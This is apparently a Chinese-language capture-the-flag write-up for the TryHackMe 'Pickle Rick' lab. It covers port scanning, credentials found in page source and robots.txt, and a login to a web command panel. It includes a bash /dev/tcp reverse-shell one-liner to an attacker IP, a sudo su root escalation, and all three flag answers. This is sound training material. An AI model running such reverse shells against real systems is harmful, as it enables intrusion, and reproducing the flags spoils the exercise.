[Day9] THM Pickle Rick

今天来解的题目比较不是寻找公开 Exploit 的方式，而是要靠自己在网页上寻宝(?)，来取得进一步的权限，也比较像 CTF 通灵的题目。

• 网址：https://tryhackme.com/room/picklerick
• IP ： 10.10.223.99

扫 Port

• nmap -A 10.10.223.99
  • 
  • 22 port
  • 80 port

观察网页

• 观察首页原始码
  • 
  • 提示 username : R1ckRul3s
• 观察 robots.txt
  • 
  • Wubbalubbadubdub
  • 发现有一段可能是密码的字串(?)

Login

• 在网址後面加上 /login.php 就可以进入登入
  • 
  • 使用 Username : R1ckRul3s
  • Password : Wubbalubbadubdub

Webshell

• 进入後就是一个 webshell
  • 戳成 reverse shell
    • bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'
    • 本地端输入 nc -vlk 7877
    • 就能拿到 shell 了
• Flag1
  • 
  • 在 web 目录
  • mr. meeseek hair
• Flag2
  • 
  • 在 rick 家目录
  • 1 jerry tear
• Flag3
  • 
  • 发现可以直接 sudo su
  • 所以就进 root 取得最後一个 flag
  • fleeb juice